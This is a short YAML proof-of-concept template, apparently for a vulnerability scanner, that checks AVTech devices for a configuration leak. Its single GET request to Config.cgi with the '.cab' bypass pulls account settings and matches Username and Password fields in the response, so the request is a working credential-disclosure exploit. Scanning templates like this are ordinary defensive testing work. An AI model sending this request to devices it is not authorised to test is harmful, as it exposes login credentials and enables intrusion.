name: poc-yaml-avtech-config-info-leak
binding: 74e9f98d-ee0d-411d-a44e-ff71ab3a9805
manual: true
detail:
    author: EASY(https://github.com/EASY233)
    links:
        - https://paper.seebug.org/81/#4
    vulnerability:
        id: CT-529706
        level: high
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(b"Username=") && response.body.bcontains(b"Password=") && response.body.bcontains(b"Lifetime=") && response.body.bcontains(b"Account.") && response.headers["nServer"].contains("Avtech")
expression: r0()
